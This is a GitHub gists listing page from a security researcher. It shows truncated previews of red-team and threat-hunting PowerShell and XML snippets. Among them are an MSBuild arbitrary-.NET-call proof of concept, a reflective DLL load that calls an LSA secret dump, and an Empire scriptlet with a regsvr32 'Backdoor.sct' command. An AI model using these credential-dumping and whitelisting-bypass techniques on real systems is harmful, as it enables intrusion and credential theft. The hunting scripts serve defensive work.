Skip to content

Instantly share code, notes, and snippets.

Scott Sutherland nullbind

Block or report user

Report or block nullbind

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@nullbind
nullbind / poc.png
Created May 22, 2019 — forked from caseysmithrc/poc.png
MSBuild - Property functions -
View poc.png
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View TellMeYourSecrets.ps1
# PowerShellery
# Source: https://github.com/0xbadjuju/TellMeYourSecrets
# Note: This was hacked together for the sake of portability.
# Note: To refresh TellMeYourSecrets.dll do the following:
# $Bytes = [System.IO.File]::ReadAllBytes("C:\temp\TellMeYourSecrets.dll")
# $MyString = [System.Convert]::ToBase64String($Bytes)
# or
# $Bytes = [System.IO.File]::ReadAllBytes("C:\users\istest1\Desktop\TellMeYourSecrets.dll")
# [System.Reflection.Assembly]::Load($Bytes)
# [TellMeYourSecrets.LSA]::DumpLsa()
@nullbind
nullbind / Get-DomainComputerWSMAN.ps1
Created May 1, 2019
Get-DomainComputerWSMAN.ps1
View Get-DomainComputerWSMAN.ps1
# This script uses the ActiveDirectory module to enumerate live Windows system on the domain that support WMI/PS Remoting,
# and filters out win7 and 2k3
# Run on domain system or via 'runas /netonly /user:domain\user powershell.exe'
# Initial DC
$InitialDc = '10.4.222.205'
# Create connection to initial dc
Import-Module ActiveDirectory
@nullbind
nullbind / Invoke-HuntWmiSubscription.ps1
Created May 1, 2019
Invoke-HuntWmiSubscription.ps1
View Invoke-HuntWmiSubscription.ps1
# Author: Alexander Leary
#--------------------------------------------------------------------------------
# Add-ObjectWMI
#--------------------------------------------------------------------------------
Function local:Add-ObjectWMI{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$true, Position=0, ValueFromPipeline=$true,
ValueFromPipelineByPropertyName=$true, HelpMessage="Name")]
[string]$Name = "",
View FindFiles.ps1
$allusersstartuP = Invoke-Command -Session (Get-PSSession) -ScriptBlock {Get-childItem "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs\StartUp\" | select fullname}
View Invoke-HuntEvents.ps1
function Invoke-HuntEvents {
# Set event ids
$x = "4768,4662,1917,216,8224,20001,106,4720,4732"
# Parse into list
$y = $x.Split(',')
# Look up events
@nullbind
nullbind / Invoke-HuntServiceInfo.ps1
Created May 1, 2019
Invoke-HuntServiceInfo.ps1
View Invoke-HuntServiceInfo.ps1
Get-WmiObject -Class win32_service | Select Name,ServiceName,Description,PathName,ServiceType,StartMode,Status,InstallDate
#this can be run against all active psremoting sessions
@nullbind
nullbind / Invoke-HuntServiceInfo.ps1
Created May 1, 2019
Invoke-HuntServiceInfo.ps1
View Invoke-HuntServiceInfo.ps1
Get-WmiObject -Class win32_service | Select Name,ServiceName,Description,PathName,ServiceType,StartMode,Status,InstallDate
#this can be run against all active psremoting sessions
@nullbind
nullbind / Invoke-HuntRegAutoruns.ps1
Last active May 1, 2019
Invoke-HuntRegAutoruns.ps1
View Invoke-HuntRegAutoruns.ps1
# use this with powershell remote sessions
# New-PSDrive -PSProvider ActiveDirectory -Name RemoteADS -Root "" -Server a.b.c.d -credential domain\user
# cd RemoteADS:
# Get-ADComputer -Filter * -Properties name | select @{Name="ComputerName";Expression={$_."name"}} | New-PSSession
# Get-PSSession | Invoke-Command -FilePath C:\Invoke-HuntRegAutoruns.ps1
# $Results = Get-PSSession | Invoke-Command -FilePath C:\Invoke-HuntRegAutoruns.ps1
# $ScriptBlock = "ps code"
# Invoke-Command -Session (Get-PSSession) -ScriptBlock {$ScriptBlock}
# Invoke-Command -Session (Get-PSSession) -FilePath C:\Invoke-HuntRegAutoruns.ps1
# $Results | Export-Csv -Notypeinformation results.csv
@nullbind
nullbind / testingthings.sct
Last active Apr 30, 2019
testingthings.sct
View testingthings.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
You can’t perform that action at this time.